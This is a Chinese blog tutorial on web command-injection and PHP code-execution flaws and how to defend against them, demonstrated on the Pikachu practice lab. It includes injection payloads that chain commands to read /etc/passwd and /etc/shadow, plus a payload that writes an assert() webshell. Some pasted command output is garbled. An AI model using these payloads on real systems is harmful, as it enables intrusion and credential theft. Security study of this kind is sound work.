web命令及代码执行漏洞

最新推荐文章于 2024-08-27 10:34:01 发布
最新推荐文章于 2024-08-27 10:34:01 发布
阅读量1.8k 收藏
点赞数
文章标签: 渗透 kali linux web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46258964/article/details/121950967
版权

漏洞产生条件
在web应用程序中有时候开发为了考虑灵活性,简洁性会在代码调用代码或者命令
执行函数去处理,比如当应用在调用一些能将字符串转化为代码的
函数时,没有考虑用户是否能控制字符串,将造成代码执行漏洞
同样调用系统命令处理会造成命令执行漏洞

漏洞危害
可以执行系统命令危害较大,反弹shell,system权限,进入内网
利用方式简单多以python脚本或者java脚本方式攻击
长发生在框架,中间件,cms,web容器,插件等地方

常见命令拼接符

|、||、&、&&的区别:
&:		无论左边是false还是true,右边都执行
&&:	具有短路效果,左边是false,右边不执行。
|:		无论左边是false还是true,右边都会执行
||:	具有短路效果,左边是true,右边不执行。

防御
命令执行的防御分为三个方面 参数 , 函数 和 权限

    对前端传递的参数进行转译
    减少或禁用执行命令的函数
    还有就是限制web中间件的权

pikachu靶场测试命令执行漏洞
127.0.0.1&&ipconfig 执行命令得到如下,执行了ping命令也执行了ipconfig
127.0.0.1|whoami 执行了whoami命令
114.114.114.114&&uname
114.114.114.114&&密码
114.114.114.114&&ls -l
114.114.114.114&&cat /etc/passwd   //查看用户
114.114.114.114&&cat /etc/shadow  //查看密码

    Ping 127.0.0.1      32  ֽڵ     :
       127.0.0.1  Ļظ :  ֽ =32 ʱ  <1ms TTL=128
       127.0.0.1  Ļظ :  ֽ =32 ʱ  <1ms TTL=128
       127.0.0.1  Ļظ :  ֽ =32 ʱ  <1ms TTL=128
       127.0.0.1  Ļظ :  ֽ =32 ʱ  <1ms TTL=128

 127.0.0.1    Ping ͳ    Ϣ:
             :  ѷ    = 4   ѽ    = 4    ʧ = 0 (0%   ʧ)   
       г̵Ĺ   ʱ  ( Ժ   Ϊ  λ):
          = 0ms    = 0ms  ƽ   = 0ms

 Windows IP      


    ̫                 :

          ض    DNS   ׺。  .  .  .  .  .  .  : 
              IPv6   ַ。  .  .  .  .  .  .  .  : fe80::81c5:a00:a0a5:fab3%11
    IPv4      .  .  .  .  .  .  .  .  .  .  .  .  : 192.168.11.12
              .  .  .  .  .  .  .  .  .  .  .  .  : 255.255.255.0
    嬷嬷。  .  .  .  .  .  .  .  .  .  .  .  .  : 192.168.11.2

             isatap。{29E03021-A240-4FCD-8A4C-86021DA19614}:

    🌹🌹🌹🌹🌹。  .  .  .  .  .  .  .  .  .  .  .  : 呸
          ض    DNS   ׺。  .  .  .  .  .  .  :

触发点/检测

命令执行漏洞Web端不容易发现 , 大多通过代码审计 , 检查容易触发漏洞的 特殊函数 和 特殊符号

     exec();
    system();
    shell_exec();
    passthru();
    popen();
    proc_popen();
    反引号`    反引号包裹的代码会当做命令执行

代码执行漏洞
在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞
代码执行漏洞和命令一样是高危漏洞产生危害差不多

相关函数

eval()
assert()
preg_replace() + /e 模式
create_function()
array_map()
call_user_func()/call_user_func_array()
array_filter()
usort(),uasort()
file_put_contents()
fputs()
$_GET[‘a’]($_GET[‘b’]);//a=assert&b=phpinfo()

pikachu靶场测试代码执行漏洞
system(ipconfig); 会执行ipconfig命令
phpinfo(); 执行出PHP的版本
payload:fputs(fopen(‘shell.php’,‘w’),’<?php assert($_POST[cmd]);?>’) 上传木马

防御
对于eval( )函数一定要保证用户不能轻易接触eval的参数或者用正则严格判断输入的数据格式。
对于字符串一定要使用单引号包裹可控代码,并且 插入前进行addslashes().
对于preg_replace放弃使用e修饰符。如果必须要用e修饰符,请保证第二个参数中,对于正则匹配出的对象,用单引号包裹 。

西湖第一剑
关注
RCE远程命令/代码执行漏洞及绕过
G3et的博客
01-01 823
(1)RCE主要是执行了危险的函数(3)常见的绕过:空格过滤、命令分隔符、编码绕过、Hex编码绕过、Oct编码绕过、变量绕过、反斜杠绕过、偶读拼接绕过关键字过滤等 (4)熟悉掌握php中远程命令/代码执行的相关函数以及绕过和原理参考文档:远程命令/代码执行漏洞(RCE)总结RCE远程命令执行绕过初学RCE(远程命令/代码执行漏洞
Web安全命令执行漏洞
qq_42751192的博客
08-12 1351
Web 应用需要调用一些执行系统命令的函数时,并且用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞
web命令执行漏洞
weixin_33713707的博客
11-12 290
一,什么是命令执行漏洞: 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。 二,利用条件: 1,应用调用执行命令的函数 2,...
十大常见web漏洞(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
08-27 1779
Web应用是指采用B/S架构、通过HTTP/HTTPS协议提供服务的统称。随着互联网的广泛使用,Web应用已经融入到日常生活中的各个方面:网上购物、网络银行应用、证券股票交易、政府行政审批等等。在这些Web访问中,大多数应用不是静态的网页浏览,而是涉及到服务器侧的动态处理。此时,如果Java、PHP、ASP等程序语言的编程人员的安全意识不足,对程序参数输入等检查不严格等,会导致Web应用安全问题层出不穷。
web漏洞命令执行
Bin的博客
03-23 1093
目录 一、概述 1.1何为命令执行 1.2产生条件 1.2常见命令 1.2.1 Windows 1.2.2 linux 1.3常见命令拼接符 二、产生原理 三、防御方法 四、危害 五、php常见危险函数 一、概述 1.1何为命令执行   攻击者通过web应用可以执行系统命令,从而获得敏感信息,进而控制服务器攻击内网。 1.2产生条件 1.应用调用执行命...
WEB安全-命令执行漏洞
qq_32350719的博客
03-02 1491
一、什么是命令执行漏洞? 1、概述 在Web 程序中,因为业务功能需求要通过Web前端传递参数到后台服务器上执行。 但由于开发人员没有对输入进行严格的过滤,导致攻击者可以构造一些额外的“带有非法目的”命令,去欺骗后台服务器执行这些非法命令。 在存在命令执行漏洞的情况下,如果Web 应用使用的是root权限,则该漏洞可以导致攻击者在服务器上执行任意命令。 以DVWA平台low 安全等级为例,我们来看...
Web安全——命令执行漏洞
qq_44607514的博客
03-16 225
Web安全——命令执行漏洞
第30天:WEB漏洞-RCE代码命令执行漏洞全解1
08-03
1. **墨者靶场**:提供了黑盒和白盒环境下的命令执行代码执行漏洞模拟,帮助测试和学习漏洞利用和防御。 2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求...
干货 | 命令执行漏洞代码执行漏洞详解
weixin_39670937的博客
06-20 900
命令执行(RCE)漏洞代码执行漏洞区别如下: 代码执行实际上是调用服务器网站代码进行执行命令执行则是调用操作系统命令进行执行 一、命令执行漏洞 1、什么是命令执行 命令执行(Remote Command Execution, RCE) Web应用的脚本代码执行命令的时候过滤不严 从而注入一段攻击者能够控制的代码,在服务器上以Web服务的后台权限远程执行恶意指令 成因 代码层过滤不严系统的漏洞造成命令注入调用的第三方组件存在代码执行漏洞常见的命令执行函数 PHP:exec、shell_exec、sy
WEB安全代码执行漏洞
qq_56158055的博客
01-10 1285
代码执行漏洞 应用程序在调用一些能够将字符串转换为代码的函数(如PHP中的eval)时,没有考虑用户是否控 制这个字符串,将造成代码执行漏洞。 一些代码执行命令函数 eval() assert() call_user_func()/call_user_func_array() create_function() usort()/uasort() preg_replace() array_map() ${php代码} 用法 eval() #传入的必须是有效的 PHP ..
Web漏洞命令执行
weixin_51614272的博客
02-23 1748
命令执行system命令命令同cat功能的函数绕过空格 system命令 1=system("ls /"); //查找根目录 1=system("ls ./"); //查找当前目录 1=system("ls ../"); //查找上一级目录 1=system("tac ../flag.php"); //打印上一级目录的falg.php 1=system("cp fla?.php 1.txt");//将fla?.php文件复制到1.txt 通配符? 和* 1=system("cp f*.php 1.txt")
TongWeb7.0.4.4管理控制台未授权访问目录补丁.zip
09-27
东方通7版本可能会出现在控制台中部署服务时,无法查看除/home目录外的其他目录,导致只能把war包、jar包等相关文件放在/home路径下,此补丁可解决此问题;更新后,可正常到访问服务器所有路径中的文件。
Web安全原理剖析(二十七)——命令执行漏洞
Phantom03167的博客
01-19 3363
命令执行漏洞
web渗透之——命令执行漏洞
wsnbbz的博客
03-04 1412
漏洞分类 1.web代码命令执行 exec(“whoami”); 2.第三方组件命令执行漏洞 WordPress中用来处理图片的ImageMagick组件 JAVA中的命令注入漏洞(struts2/ElasticsearchGroovy等) vBulletin 5.x 版本通杀远程代码执行 3.系统层面命令执行漏洞 MS08-067 bash破壳漏洞 漏洞原理 日常的网络访问中,我们常常可以看到...
web基础漏洞命令执行漏洞
m0_62274649的博客
10-04 1064
一些命令执行漏洞的总结,各种bypass掌握的还不好,继续更新
web渗透测试----9、命令执行漏洞
七天
01-18 1805
文章目录一、简介二、举例说明三、PHP命令执行实例一:命令执行实例二:代码执行实例三:动态函数调用实例四:PHP函数代码执行漏洞四、Java命令执行五、常见注入方式六、常见无回显的利用方式6.1、使用时间延迟检测无回显命令注入6.2、通过重定向输出来进行无回显命令注入6.3、利用带外通道技术(OOB)6.4、bash反弹shell七、防御附件:一些常见语言的危险函数 一、简介 命令注入漏洞通常是通过注入恶意的命令参数,拼接原本正常的命令语句,达到执行恶意命令目的的一类漏洞。 系统命令是可以连接执行的,在没
web安全】-- 命令执行漏洞详解
m0_72286569的博客
04-30 1840
命令执行漏洞是一种网络安全漏洞,它允许攻击者在受影响的系统上执行恶意命令。这种漏洞通常出现在软件应用程序或系统中,其典型示例是 Web 应用程序中的远程命令执行(RCE)漏洞
web渗透之——任意代码执行漏洞
wsnbbz的博客
03-04 1507
漏洞原理 当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞 在php中: eval,assert,将字符串当成代码执行 preg_replace("/wslp/e","$xr",“wslp”);用第二个参数的执行结果替换第三个参数里的第一个参数指定的值 漏洞形成 如果被执行的字符串是通过前端参数传过来的攻击代码,或者数据库里被植入攻击代码数据,就...
安全漏洞从原理到实战--命令执行漏洞
qq_35254085的博客
08-03 360
一、命令执行漏洞简介 命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。 命令执行漏洞成因 命令执行漏洞形成的原因是web服务器对用户输入的命令安全监测不足,导致恶意代码执行命令执行漏洞分类 系统命令执行漏洞:传入系统命令 PHP代码执行漏洞:传入PHP代码 系统命令执行函数 1、system 含义 执行外部程序,并且显示输出 (2)语法 system ( string KaTeX parse error: Expected 'EOF', got '&am
Web攻防:01章命令执行漏洞原理与防范
总结来说,命令执行漏洞Web安全领域的重要议题,开发者在构建应用程序时必须重视输入验证和参数过滤,以防止恶意用户的代码注入和滥用系统功能。同时,学习如何识别和修复此类漏洞对于保护Web应用免受攻击至关重要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值